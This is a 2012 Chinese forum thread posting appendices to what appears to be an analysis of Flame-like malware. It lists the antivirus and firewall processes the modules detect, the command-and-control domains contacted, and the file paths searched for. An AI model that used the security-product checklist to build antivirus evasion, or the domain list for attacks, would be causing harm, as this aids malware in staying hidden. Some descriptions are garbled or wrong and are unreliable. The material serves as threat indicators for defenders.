  
  

jpfsrv.exe

  
  

JeticoPersonalFirewall的服务进程。

  
  

PXConsole.exe

  
  

Prevx Home反间谍软件进程

  
  

ONLINENT.exe

  
  

Quick Heal Total安全产品相关进程

  
  

SSUpdate.exe

  
  

SUPERAntiSpyware 间谍扫描软件进程

  
  

SpywareTerminator.exe

  
  

Crawler杀毒软件相关进程

  
  

ONLNSVC.exe

  
  

F-Secure反病毒软件相关程序

  
  

mpsvc.exe

  
  

微点主动防御进程

  
  

vsserv.exe

  
  

Bull Guard网络安全套装和BitDefender反病毒软件相关程序

  
  

cpf.exe

  
  

ComodoPersonalFirewall主程序。

  
  

UmxPol.exe

  
  

TinyFirewall相关进程。TinyFirewall是由

  
  

RDTask.exe

  
  

虚拟光碟相关程序。虚拟光碟是一套集成的CD/DVD刻录和光碟机模拟的软件。911CHA.com提供

  
  

TmPfw.exe

  
  

tmpfw.exe是趋势公司网络安全软件的一部分。

  
  

ike.exe

  
  

FortiClient软件的SSL VPN服务

  
  

DFAdmin6.exe

  
  

冰点还原精灵产品是的一个进程

  
  

asr.exe

  
  

Advanced_Spyware_Remover反间谍软件程序。

  
  

FWService.exe

  
  

PCToolsFirewallPlus的服务进程

  
  

protect.exe

  
  

Safe'n'Sec 产品中的一个进程

  
  

NJEEVES.exe

  
  

Norman反病毒产品的一部分

  
  

TMAS_OEMon.exe

  
  

Trend Micro Anti-Spam中的一个进程

  
  

sp_rsser.exe

  
  

SpywareTerminator反间谍软件相关程序。

  
  

WSWEEPNT.exe

  
  

Sophos Anti-Virus进程

  
  

ipcsvc.exe

  
  

NetVeda Safety.Net安全软件进程。

  
  

UmxAgent.exe

  
  

CA Anti-Virus相关服务进程

  
  

Umxlu.exe

  
  

TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。

  
  

kav.exe

  
  

卡巴斯基Kaspersky Anti-Virus反病毒产品进程

  
  

MPF.exe

  
  

McAfee网络安全套装软件相关进程,用于保护你的计算机免受网络蠕虫和病毒的威胁。

  
  

umxagent.exe

  
  

CA Anti-Virus相关服务进程

  
  

avp.exe

  
  

卡巴斯基Kaspersky Anti-Virus反病毒产品进程

  
  

TSmpNT.exe

  
  

Omniquad MyPrivacy软件进程。

  
  

fsgk32st.exe

  
  

F-Secure反病毒软件相关程序。

  
  

zlclient.exe

  
  

ZoneAlarm个人防火墙的客户端程序。

  
  

R-Firewall.exe

  
  

R-Firewall个人防火墙进程。

  
  

sww.exe

  
  

不详

  
  

umxtray.exe

  
  

TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件

  
  

ccApp.exe

  
  

Norton AntiVirus 2003反病毒软件的一部分。它能够自动保护你的计算机安全。

  
  

avpm.exe

  
  

卡巴斯基Kaspersky公司出品的反病毒套装的一部分

  
  

smc.exe

  
  

Norton AntiVirus 反病毒软件的一部分。它能够自动保护你的计算机安全。

  
  

PF6.exe

  
  

Privatefirewall相关进程

  
  

ipcTray.exe

  
  

NetVeda Safety.Net安全软件进程。

  
  

fsaua.exe

  
  

该进程属于F-Secure公司的自动更新代理

  
  

fsqh.exe

  
  

F-secure反病毒软件的隔离管理工具

  
  

R-firewall.exe

  
  

R-Firewall个人防火墙进程

  
  

pcipprev.exe

  
  

防火墙软件

  
  

blackice.exe

  
  

BlackICE 是一款防火墙软件,blackice.exe为主要进程。

  
  

ekrn.exe

  
  

ESET Smart SecurityESET NOD32 Antivirus反病毒软件相关程序

  
  

configmgr.exe

  
  

IBM Case Manager中进程。

  
  

ipatrol.exe

  
  

互联网安全联盟,安全软件

  
  

savadminservice.exe

  
  

SophosAnti-Virus(SAV)是一款英国的防毒软件的一部分

  
  

alupdate.exe

  
  

是系统正常运转、各种办公软件、游戏运行所不可或缺的重要文件

  
  

Zanda.exe

  
  

Norman反病毒产品控制程序,同时是驻留精灵程序。

  
  

nstzerospywarelite.exe

  
  

反间谍软件的一部分

  
  

AdoronsFirewall.exe

  
  

Adorons防火墙应用程序一部分

  
  

vsmon.exe

  
  

ZoneAlarm个人防火墙的一部分

  
  

snsmcon.exe

  
  

Safe'n'Sec嬀/size]图形用户界面是从公司SNSafe与软件属于产品Safe'n'Sec  2009的进程文件

  
  

vdtask.exe

  
  

一款虚拟光驱软件

  
  

OEInject.exe

  
  

Omniquad Total Security反病毒软件相关进程。

  
  

procguard.exe

  
  

with description GUI  Aspect of ProcessGuard is a process file from company DiamondCS belonging to  product DiamondCS ProcessGuard.
  The file is not digitally signed.

  
  

UmxCfg.exe

  
  

TinyFirewall网络防火墙软件相关进程

  
  

SpywareTerminatorShield.exe

  
  

pyware Terminator进程一款免费且易用的间谍软件清除软件

  
  

fsgk32.exe

  
  

-Secure反病毒软件相关程序

  
  

mpfcm.exe

  
  

不详

  
  

SWNETSUP.exe

  
  

Sophos Anti-Virus反病毒与网络支持服务应用程序相关的进程

  
  

UfSeAgnt.exe

  
  

是趋势Trend Micro出品的PC-cillin反病毒软件的一部分

  
  

fsguidll.exe

  
  

一款功能强大的实时病毒监测和防护系统

  
  

clamd.exe

  
  

杀毒软件Clam AV的相关进程

  
  

PXAgent.exe

  
  

Prevx Home 安全软件的相关部分

  
  

snsupd.exe

  
  

此文件属于产品SysWatch嬀/size]企业和是由公司匀一匀愀昀攀嬀/size]软件开发。
此文件描述SysWatch嬀/size]客户端更新的一部分

  
  

updclient.exe

  
  

ZoneAlarm公司安全软件升级相关程序

  
  

tikl.exe

  
  

恶意键盘记录程序

  
  

FirewallGUI.exe

  
  

一款防火墙个相关程序

  
  

ZeroSpyware Lite.exe

  
  

zerospyware反间谍进程

  
  

RTT_CRC_Service.exe

  
  

R-Firewall防火墙的一部分

  
  

SfCtlCom.exe

  
  

是趋势Trend Micro出品的PC-cillin反病毒软件的一部分

  
  

FrzState.exe

  
  

冰点还原产品中的一个进程

  
  

avgnt.exe

  
  

H+BEDV反病毒产品的一部分,用于扫描你系统的安全问题

  
  

cmdagent.exe

  
  

Comodo防火墙进程,能帮助您侦测和清除病毒,它还有Vshield自动监视系统,会常驻在系统托盘,当您从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性,若文件内含病毒,便会立即警告,并作适当的处理,而且支持鼠标右键的快速选单功能,并可使用密码将个人的设定锁住让别人无法乱改您的设定。

  
  

sppfw.exe

  
  

GmbH公司Securepoint软件程序。防火墙类相关软件进程。

  
  

cdinstx.exe

  
  

杀毒软件anti-spyware进程

  
  

aupdrun.exe

  
  

Agnitum Outpost Firewall 防火墙自动升级程序

  
  

omnitray.exe

  
  

Genetec Omnicast公司的Network DVR Server进程

  
  

Kpf4ss.exe

  
  

Kerio个人防火墙的Windows进程的一部分

  
  

gateway.exe

  
  

WindUpdates的广告计划的一个进程

  
  

FSMA32.exe

  
  

F-Secure反病毒软件的一部分。

  
  

SavService.exe

  
  

Sophos Anti-Virus Module软件相关进程

  
  

BootSafe.exe

  
  

能够快速重启进入安全模式的小程序

  
  

fspc.exe

  
  

F-Secure的互联网安全套件进程

  
  

AntiHook.exe

  
  

AntiHook控制中心进程

  
  

dfw.exe

  
  

Signs防火墙进程

  
  

FSM32.exe

  
  

F-Secure反病毒软件的一部分。

  
  

Netguard Lite.exe

  
  

ZeroSpyware间碟软件中的一部分

  
  

pfsvc.exe

  
  

Privacyware创建一个Windows文件,防火墙相关软件。

  
  

op_mon.exe

  
  

OutpostFirewall防火墙的实时监控程序

  
  

zerospyware le.exe

  
  

ZeroSpyware个人隐私防护软件相关进程

  
  

DF5SERV.exe

  
  

冰点还原产品中的一部分

  
  

TmProxy.exe

  
  

是趋势Trend Micro出品的PC-cillin反病毒软件的一部分。

  
  

safensec.exe

  
  

Safe'n'Sec 产品中的一个进程

  
  

FSMB32.exe

  
  

F-Secure反病毒软件的一部分。

  
  

Tray.exe

  
  

NetVeda Safety.Net安全软件进程。

  
  

umxfwhlp.exe

  
  

TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件

  
  

nvcoas.exe

  
  

Norman Virus进程

  
  

FAMEH32.exe

  
  

F-Secure Anti-Virus进程

  
  

tinykl.exe

  
  

很好用的微小的键盘纪录工具。

  
  

ccSetMgr.exe

  
  

Symantec公司网络安全套装的一部分

  
  

SUPERAntiSpyware.exe

  
  

SUPERAntiSpyware反间谍软件的相关部分。

  
  

fsav32.exe

  
  

F-Secure Anti-Virus进程

  
  

outpost.exe

  
  

Outpost Personal Firewall个人防火墙相关程序。

  
  

UmxFwHlp.exe

  
  

是由TinySoftware出品的一款网络防火墙软件

  
  

Fspex.exe

  
  

F-Secure Anti-Virus相关服务进程

  
  

bdagent.exe

  
  

BitDefenderProfessional杀毒软件相关程序。

  
  

wwasher.exe

  
  

Webwasher安全产品的相关进程

  
  

VCATCH.exe

  
  

属于产品VCatch 2003CommonSearch的相关进程

  
  

spfirewallsvc.exe

  
  

SecurePoint公司防火墙驱动程序进程

  
  

cdas17.exe

  
  

CyberDefender  AntiSpyware反间谍软件相关进程。

  
  

dvpapi.exe

  
  

Authentium Antivirus的相关进程

  
  

fssm32.exe

  
  

F-Secure反病毒软件相关程序,用于扫描病毒

  
  

livesrv.exe

  
  

BitDefenderProfessional杀毒软件在线升级程序

  
  

Fsav32.exe

  
  

F-Secure反病毒软件相关进程

  
 楼主| 发表于 2012-8-2 09:33 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 10:16 编辑

附录二

表5-2连接所有域名列表


adhotspot.biz
admin-on.biz
autosync.info
bannerspot.in
bannerzone.in
bestcopytoday.com
bytewiser.com
chchengine.com
chchengine.net
dailynewsupdater.com
dbdrivers.biz
diznet.biz
dnslocation.info
dnsmask.info
dnsportal.info
dnsupdate.info
dvmdownload.net
eventshosting.com
fastestever.net
fastinfo.biz
flashp.webhop.net
flashupdates.info
flushdns.info
isyncautomation.in
isyncautoupdater.in
liveservice.biz
living-help.com
localconf.com
localgateway.info
micromedia.in
mysync.info
netproof.info







netsharepoint.
infonetwork-acs.biz
networkupdate.net
newsflashsite.com
newstatisticfeeder.com
newsync.info
nvidiadrivers.info
nvidiasoft.info
nvidiastream.info
pingserver.info
processrep.com
profcenter.biz
quick-net.info
rendercodec.info
rsscenter.webhop.info
sec-enhanced.org
serveflash.info
serverss.info
smart-access.net
smartservicesite.info
specthosting.biz
syncdomain.info
synclock.info
syncprovider.info
syncsource.info
syncstream.info
syncupdate.info
traffic-spot.biz
traffic-spot.com
ultrasoft.in
update-ver.biz
videosync.info






 楼主| 发表于 2012-8-2 09:46 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 10:16 编辑

附录三
表5-3advnetcfg.ocx模块检测反病毒软件进程列表,其中有些进程也在别的模块中出现过。
   

进程名称

   
   

说明

   
  

fwsrv.exe

  
  

AVG Firewall Service进程。

  
  

ssupdate.exe

  
  

UPERAntiSpyware 间谍扫描软件进程

  
  

zerospyware lite.exe

  
  

zerospyware反间谍进程

  
  

dcsuserprot.exe

  
  

DiamondCS  ProcessGuard进程一款系统安全程序

  
  

spywareterminatorshield.exe

  
  

Spyware Terminator进程一款免费且易用的间谍软件清除软件

  
  

zerospyware  lite_installer.exe

  
  

ZeroSpyware相关组件进程
一款个人隐私防护软件

  
  

umxagent.exe

  
  

CA Anti-Virus相关服务进程

  
  

fsdfwd.exe

  
  

F-Secure Anti-Virus相关组件进程

  
  

fspex.exe

  
  

F-Secure Anti-Virus相关服务进程

  
  

sab_wab.exe

  
  

SUPERAntiSpyware相关组件进程

  
  

blinkrm.exe

  
  

eEyt Digital Security公司开发的产品进程。

  
  

pxconsole.exe

  
  

Prevx Home反间谍软件进程

  
  

jpfsrv.exe

  
  

JeticoPersonalFirewall的服务进程。

  
  

lpfw.exe

  
  

Lavasoft Personal  Firewall进程

  
  

updclient.exe

  
  

ZoneAlarm公司安全软件升级相关进程

  
  

fameh32.exe

  
  

F-Secure Anti-Virus进程

  
  

blinksvc.exe

  
  

eEye Digital Security相关组件进程

  
  

spyhunter3.exe

  
  

SpyHunter反间谍软件进程

  
  

swupdate.exe

  
  

Sophos AntiVirus进程

  
  

nvcoas.exe

  
  

Norman Virus进程

  
  

fch32.exe

  
  

F-Secure Anti-Virus进程

  
  

pgaccount.exe

  
  

是关于个人帐户的进程项,当注销后用另一个帐户登录计算机,有可能会出现两个该进程项。

  
  

blink.exe

  
  

eEyt数字安全公司开发的产品进程。

  
  

umxcfg.exe

  
  

TinyFirewall网络防火墙软件相关进程。TinyFirewallTinySoftware出品的一款网络防火墙软件。

  
  

zlh.exe

  
  

Norman反病毒网络安全套装控制程序。

  
  

fsm32.exe

  
  

F-Secure反病毒软件相关程序,用于管理对病毒扫描的计划任务。

  
  

live help.exe

  
  

Windows32的应用程序相关进程

  
  

vcatch.exe

  
  

属于产品VCatch 2003CommonSearch的相关进程

  
  

icmon.exe

  
  

Sophos AntiVirus防毒检测的活动监视器进程

  
  

netguard lite.exe

  
  

ZeroSpyware间碟软件中的一部分

  
  

cpf.exe

  
  

ComodoPersonalFirewall主程序。

  
  

nip.exe

  
  

Norman反病毒软件控制台程序。它用于实时扫描监控POP3SMTPNNTP协议病毒。

  
  

asr.exe

  
  

Advanced_Spyware_Remover反间谍软件程序。

  
  

nvcsched.exe

  
  

NVCSched.exeNorman病毒控制台计划任务程序,用于进行计划扫描任务。

  
  

ipctray.exe

  
  

NetVeda Safety.Net安全软件进程。

  
  

sp_rsser.exe

  
  

SpywareTerminator反间谍软件相关程序。

  
  

firewall 2004.exe

  
  

WyvernWorks Firewall  2004软件进程。

  
  

kpf4gui.exe

  
  

Kerio个人防火墙相关进程。

  
  

ipcsvc.exe

  
  

NetVeda Safety.Net安全软件进程。

  
  

sppfw.exe

  
  

GmbH公司Securepoint软件程序。防火墙类相关软件进程。

  
  

avp.exe

  
  

卡巴斯基杀毒软件相关程序。

  
  

fsgk32st.exe

  
  

F-Secure反病毒软件相关程序。

  
  

zlclient.exe

  
  

ZoneAlarm个人防火墙的客户端程序。

  
  

fsguiexe.exe

  
  

F-Secure反病毒软件相关程序。

  
  

umxpol.exe

  
  

TinyFirewall是由TinySoftware出品的一款网络防火墙软件

  
  

umxtray.exe

  
  

TinyFirewall是由TinySoftware出品的一款网络防火墙软件

  
  

cclaw.exe

  
  

Norman反病毒软件病毒控制程序

  
  

zanda.exe

  
  

Norman反病毒产品控制程序,同时是驻留精灵程序。

  
  

rtt_crc_service.exe

  
  

R-Firewall防火墙相关程序

  
  

fsaua.exe

  
  

-Secure公司的自动更新代理

  
  

fsqh.exe

  
  

F-secure反病毒软件的隔离管理工具

  
  

pcipprev.exe

  
  

防火墙软件

  
  

ipatrol.exe

  
  

互联网安全联盟,安全软件

  
  

licwiz.exe

  
  

不详

  
  

nstzerospywarelite.exe

  
  

反间谍软件的一部分

  
  

njeeves.exe

  
  

Norman反病毒产品的一部分

  
  

vsmon.exe

  
  

ZoneAlarm个人防火墙的一部分

  
  

fsbwsys.exe

  
  

F-secure反病毒软件的相关程序

  
  

vdtask.exe

  
  

一款虚拟光驱软件

  
  

procguard.exe

  
  

是一个安全软件

  
  

fsgk32.exe

  
  

F-Secure反病毒软件相关程序

  
  

umxlu.exe

  
  

TinyFirewall是由TinySoftware出品的一款网络防火墙软件。

  
  

fsguidll.exe

  
  

F-SecureAnti公司的-VirusClientSecurity是一款功能强大的实时病毒监测和防护系统相关程序

  
  

clamd.exe

  
  

杀毒软件Clam AV的相关进程

  
  

fsma32.exe

  
  

F-Secure反病毒软件的一部分。

  
  

rdtask.exe

  
  

Windows系统进程

  
  

wsweepnt.exe

  
  

Sophos Anti-Virus进程

  
  

jpf.exe

  
  

JeticoPersonalFirewall是一款功能全面且简单易用的网络防护软件,可以有效确保计算机免受黑客侵扰

  
  

tikl.exe

  
  

恶意键盘记录程序

  
  

kpf4ss.exe

  
  

Kerio个人防火墙的Windows进程的一部分

  
  

superantispyware.exe

  
  

SUPERAntiSpyware反间谍软件的相关部分。

  
  

pxagent.exe

  
  

Prevx Home 安全软件的相关部分

  
  

fsmb32.exe

  
  

F-Secure反病毒软件的一部分。

  
  

cmdagent.exe

  
  

Comodo防火墙进程,能帮助您侦测和清除病毒

  
  

cdinstx.exe

  
  

毒软件anti-spyware进程

  
  

swnetsup.exe

  
  

Sophos Anti-Virus反病毒与网络支持服务应用程序相关的进程

  
  

bootsafe.exe

  
  

能够快速重启进入安全模式的小程序

  
  

fspc.exe

  
  

F-Secure的互联网安全套件进程

  
  

antihook.exe

  
  

AntiHook控制中心进程

  
  

dfw.exe

  
  

Signs防火墙进程

  
  

elogsvc.exe

  
  

Entrust Entelligence安全软件进程。

  
  

spywareterminator.exe

  
  

Crawler杀毒软件相关进程

  
  

op_mon.exe

  
  

OutpostFirewall防火墙的实时监控程序

  
  

zerospyware le.exe

  
  

ZeroSpyware个人隐私防护软件相关进程

  
  

fssm32.exe

  
  

F-Secure反病毒软件的一部分。

  
  

umxfwhlp.exe

  
  

TinyFirewall相关进程。TinyFirewall是由 TinySoftware出品的一款网络防火墙软件

  
  

authfw.exe

  
  

Authentium Firewall进程

  
  

tinykl.exe

  
  

很好用的微小的键盘纪录工具

  
  

r-firewall.exe

  
  

R-Firewall个人防火墙进程。

  
  

fsav32.exe

  
  

F-Secure反病毒软件相关进程

  
  

wwasher.exe

  
  

Webwasher安全产品的相关进程

  
  

spfirewallsvc.exe

  
  

SecurePoint公司防火墙驱动程序进程

  
  

cdas17.exe

  
  

CyberDefender  AntiSpyware反间谍软件相关进程。

  
  

dvpapi.exe

  
  

Authentium Antivirus的相关进程

  
  

nvoy.exe

  
  

ZeroSpyware个人隐私防护软件相关进程

  
  

eeyeevnt.exe

  
  

eEye数字安全套件相关进程

  
 楼主| 发表于 2012-8-2 09:48 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 16:14 编辑

附录四

5-4Nteps32.ocx模块检测反病毒软件进程列表,其中有些进程也在别的模块中出现过。

   进程名称      说明   
  avgamsvr.exe    AVG Antivirus 组件进程  
  fwsrv.exe    Jetico Personal Firewall 进程一款全面而又简单易用的个人网络防火墙  
  ssupdate.exe    SUPERAntiSpyware 间谍扫描软件进程  
  kavmm.exe    Kaspersky Anti-Virus Personal Pro 5 进程  
  emlproxy.exe    Quick Heal AntiVirus进程一款印度的著名安全软件  
  xauth_service.exe    不详  
  mpsvc.exe    微点主动防御进程  
  fprottray.exe    F-Prot AntiVirus 相关组件进程  
  dcsuserprot.exe    DiamondCS ProcessGuard进程一款系统安全程序  
  spywareterminatorshield.exe    Spyware Terminator进程一款免费且易用的间谍软件清除软件  
  zerospyware lite_installer.exe    ZeroSpyware相关组件进程  
  umxagent.exe    CA Anti-Virus相关服务进程  
  fsdfwd.exe    F-Secure Anti-Virus相关组件进程  
  fsrt.exe    Fortres Security进程  
  rdtask.exe    Windows系统进程  
  fspex.exe    F-Secure Anti-Virus相关服务进程  
  sab_wab.exe    不详  
  avgemc.exe    AVG Anti-Virus进程  
  emlproui.exe    Quick Heal AntiVirus进程  
  avgcc.exe    AVG Anti-Virus进程  
  pxconsole.exe    Prevx Home反间谍软件进程  
  authfw.exe    Authentium Firewall进程  
  app_firewall.exe    NetScaler App Firewall进程  
  lpfw.exe    Lavasoft Personal Firewall进程  
  avgupsvc.exe    AVG Anti-Virus进程  
  wsweepnt.exe    Sophos Anti-Virus进程  
  fameh32.exe    F-Secure Anti-Virus进程  
  blinksvc.exe    eEye Digital Security相关组件进程  
  spyhunter3.exe    SpyHunter反间谍软件进程  
  fxsrv.exe    不详  
  swupdate.exe    Sophos AntiVirus进程  
  nvcoas.exe    Norman Virus进程  
  fch32.exe    F-Secure Anti-Virus进程  
  zerospyware lite.exe    zerospyware反间谍软件进程  
  tsatisy.exe    Omniquad AntiSpy软件进程。AntiSpy 可以帮你清除Cookies、浏览网站纪录、网络缓存文件、Windows操作系统中的打开程序纪录、最近打开文件,甚至于Media Player中的打开纪录也可一并清空。  
  pgaccount.exe     是关于个人帐户的进程项,当注销后用另一个帐户登录计算机,有可能会出现两个该进程项。  
  blink.exe    eEyt数字安全公司开发的产品进程。  
  umxcfg.exe     TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。  
  zlh.exe     ZLH.exeNorman反病毒网络安全套装控制程序。  
  fsm32.exe     F-Secure反病毒软件相关程序,用于管理对病毒扫描的计划任务。  
  avginet.exe     AVGAnti-Virus/Spyware软件的在线升级程序。  
  scanwscs.exe     Quick Heal Technologies公司QuickHeal反病毒软件产品进程。  
  elogsvc.exe     来自Entrust  Entelligence安全软件进程。  
  configmgr.exe    IBM Case Manager中进程。  
  vcatch.exe     不详  
  winlogon.exe    Windows Logon ProcessWindows  NT 用户登陆程序,管理用户登录和退出。  
  tinykl.exe    很好用的微小的键盘纪录工具。  
  netguard lite.exe    不详  
  blinkrm.exe    eEyt Digital Security公司开发的产品进程。  
  netmon.exe    NetworkMonitor一款用于管理和监测网络状况的软件进程,或netmon.exe是一个注册的群发邮件蠕虫的进程(小邮差病毒变种Worm.Mimail.m)。  
  ike.exe    不详  
  cpf.exe    ComodoPersonalFirewall主程序。ComodoPersonalFirewall是一款功能强大的、高效的且容易使用的安全防护软件。  
  avgfwsrv.exe    AVG Firewall Service进程。  
  asr.exe    Advanced_Spyware_Remover反间谍软件程序。  
  nvcsched.exe    NVCSched.exeNorman病毒控制台计划任务程序,用于进行计划扫描任务。  
  ipctray.exe    NetVeda Safety.Net安全软件进程。  
  sp_rsser.exe    SpywareTerminator反间谍软件相关程序。  
  firewall 2004.exe    WyvernWorks Firewall 2004软件进程。  
  kpf4gui.exe    Kerio个人防火墙相关进程。  
  ipcsvc.exe    NetVeda Safety.Net安全软件进程。  
  kav.exe    kav.exe是卡巴斯基Kaspersky  Anti-Virus反病毒软件的一部分。  
  sppfw.exe    GmbH公司Securepoint软件程序。防火墙类相关软件进程。  
  avp.exe    卡巴斯基杀毒软件相关程序。  
  tsmpnt.exe    Omniquad MyPrivacy软件进程。Omniquad MyPrivacy 是款通过彻底删除留在计算机上的隐蔽信息来保护你的隐私的软件。  
  fsgk32st.exe    F-Secure反病毒软件相关程序。  
  zlclient.exe    ZoneAlarm个人防火墙的客户端程序。  
  fsguiexe.exe    F-Secure反病毒软件相关程序。  
  r-firewall.exe    R-Firewall个人防火墙进程。  
  sww.exe    产品名称:爽歪歪,爽歪歪是一款游戏外挂。包括天空小小岛,小小岛,冒险岛等游戏的外挂。  
  tscutynt.exe    产品名称:  Omniquad Total Security,是一个安全软件。  
  cdas17.exe    不详  
  cclaw.exe    cclaw.exeNorman反病毒软件病毒控制程序。同时用于Norman反病毒扫描器。  
  avpm.exe    avpm.exe是卡巴斯基Kaspersky公司出品的反病毒套装的一部分。用于保护你的计算机免受网络威胁的攻击。  
  zanda.exe    Norman反病毒产品控制程序,同时是驻留精灵程序。  
  rtt_crc_service.exe    此文件是R-Firewall防火墙的一部分。  
  fsaua.exe    该进程属于F-Secure公司的自动更新代理。非系统进程。F-Secure 原名Data Fellows,是欧洲乃至世界知名的计算机及网络安全提供商。1999年该公司在赫尔辛基证券交易所(OMX  Nordic Exchange Helsinki)成功上市。  
  fsqh.exe    F-secure反病毒软件的隔离管理工具,在F-secure防病毒系统中用于集中隔离病毒。  
  pcipprev.exe    防火墙软件。  
  ipatrol.exe               安全软件,互联网安全联盟公司出品。  
  licwiz.exe    有关间谍软件的恶意文件。  
  nstzerospywarelite.exe    防火墙软件。  
  njeeves.exe             NJeeves.exeNorman反病毒产品的一部分。它用于发送消息给Norman反病毒控制不同模块。同时也用于隔离区文件夹功能。  
  vsmon.exe    ZoneAlarm个人防火墙的一部分。它用于监视网络浏览和对网络攻击进行警报。  
  fsbwsys.exe    F-Secure Internet Security Suite 公司的安全软件。  
  vdtask.exe    虚拟光盘)是一款虚拟光驱软件。  
  procguard.exe    安全软件。  
  fsgk32.exe    F-Secure反病毒软件相关程序。F-SecureAnti-VirusClientSecurity是一款功能强大的实时病毒监测和防护系统,支持所有的Windows平台,它集成了多个病毒监测引擎,如果其中一个发生遗漏,就会有另一个去监测。  
  umxlu.exe    TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。  
  onlnsvc.exe    某公司的安全软件。  
  fsguidll.exe    F-Secure反病毒软件相关程序。  
  clamd.exe    危险的病毒程序。  
  services.exe    services.exe是微软Windows操作系统的一部分。用于管理启动和停止服务。  
  fsma32.exe    fsm32.exeF-Secure反病毒软件的一部分。  
  oeinject.exe    不详  
  updclient.exe    不详  
  jpf.exe    JeticoPersonalFirewall的相关进程,JeticoPersonalFirewall是一款功能全面且简单易用的网络防护软件,可以有效确保计算机免受黑客侵扰。  
  tikl.exe    恶意键盘记录程序。  
  kpf4ss.exe    Kerio个人防火墙的Windows进程的一部分。  
  pfsvc.exe    pfsvc.exe是由Privacyware创建一个Windows文件,防火墙相关软件。  
  superantispyware.exe    SUPERAntiSpyware反间谍软件的相关部分。  
  pxagent.exe    Prevx  Home 安全软件的相关部分。  
  fsmb32.exe    fsm32.exeF-Secure反病毒软件的一部分。  
  cmdagent.exe    Comodo防火墙进程,能帮助您侦测和清除病毒,它还有Vshield自动监视系统,会常驻在系统托盘,当您从磁盘、网络上、E-mail夹文件中开启文件时便会自动侦测文件的安全性,若文件内含病毒,便会立即警告,并作适当的处理,而且支持鼠标右键的快速选单功能,并可使用密码将个人的设定锁住让别人无法乱改您的设定。  
  cdinstx.exe    杀毒软件anti-spyware进程。  
  omnitray.exe    Genetec Omnicast公司的Network DVR  Server进程。  
  avgrssvc.exe    AVG Anti-Virus杀毒软件的Resident Shield模块进程。  
  vsdesktop.exe    Virtual Sandbox 2.0 Build 209子进程。  
  swnetsup.exe    Sophos Anti-Virus反病毒与网络支持服务应用程序相关的进程。  
  fpavserver.exe    F-PROT Antivirus系统服务进程。  
  gateway.exe    WindUpdates的广告计划的一个进程。  
  tray.exe    雅虎天盾的进程。  
  bootsafe.exe    能够快速重启进入安全模式的小程序。  
  fspc.exe    F-Secure的互联网安全套件进程。  
  antihook.exe    AntiHook控制中心进程。  
  dfw.exe    8Signs防火墙进程。  
  live help.exe    Windows32的应用程序相关进程。  
  pf6.exe    Privatefirewall相关进程。  
  spywareterminator.exe    Crawler杀毒软件相关进程。  
  op_mon.exe    OutpostFirewall防火墙的实时监控程序。  
  zerospyware le.exe    ZeroSpyware个人隐私防护软件相关进程。  
  nvoy.exe    Norman AntiVirus杀毒软件相关进程。  
  umxfwhlp.exe    TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。  
  tsansrf.exe    Omniquad Anonymous Surfing安全套件相关进程。  
  fw.exe    SoftPerfect个人防火墙相关进程。  
  jpfsrv.exe    JeticoPersonalFirewall是一款功能全面且简单易用的网络防护软件,可以有效确保计算机免受黑客侵扰。  
  icmon.exe    Sophos AntiVirus防毒检测的活动监视器进程。  
  umxpol.exe    TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。  
  fsav32.exe    F-Secure反病毒软件相关进程。  
  onlinent.exe    Quick Heal Total安全产品相关进程。  
  explorer.exe    Windows32的应用程序,位于C:\windows\目录下,windows资源管理器程序。  
  wwasher.exe    Webwasher安全产品的相关进程。  
  spfirewallsvc.exe    SecurePoint公司防火墙驱动程序进程。  
  umxtray.exe    TinyFirewall相关进程。TinyFirewall是由TinySoftware出品的一款网络防火墙软件。  
  dvpapi.exe    Authentium Antivirus的相关进程。  
  fssm32.exe    F-Secure反病毒软件相关程序,用于扫描病毒。  
  eeyeevnt.exe    eEye数字安全套件相关进程。  
  xfilter.exe    费尔防火墙的相关进程。  

 楼主| 发表于 2012-8-2 09:49 | 显示全部楼层
本帖最后由 wobaxindiule 于 2012-8-2 16:15 编辑

附录五

5-5Browse32.ocx模块遍历计算机系统中是否有如下文件列表。

  "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\ssitable"          "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\mscrypt.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\lmcache.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\ntcache.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\mspovst.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\mscorest.dat"      "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\Lncache.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\dmmsap.dat"        "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\syscache.dat"      "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\domm.dat"          "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\syscache3.dat"     "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\domm3.dat"         "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\nt2cache.dat"      "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\domm2.dat"         "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\ltcache.dat"       "C:\Program  Files\Common Files\Microsoft Shared\MSSecurityMgr\dommt.dat"         "C:\Program  Files\Common Files\Microsoft Shared\MSAudio\wavesup3.drv"            "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\comspol32.ocx"                               "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\indsvc32.ocx"                                "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\scaud32.exe"                                 "C:\WINDOWS\system32\sstab11.dat"                                                 "C:\WINDOWS\system32\comspol32.ocx"                                              "C:\WINDOWS\system32\sstab12.dat"                                                 "C:\WINDOWS\system32\comspol32.ocx"                                              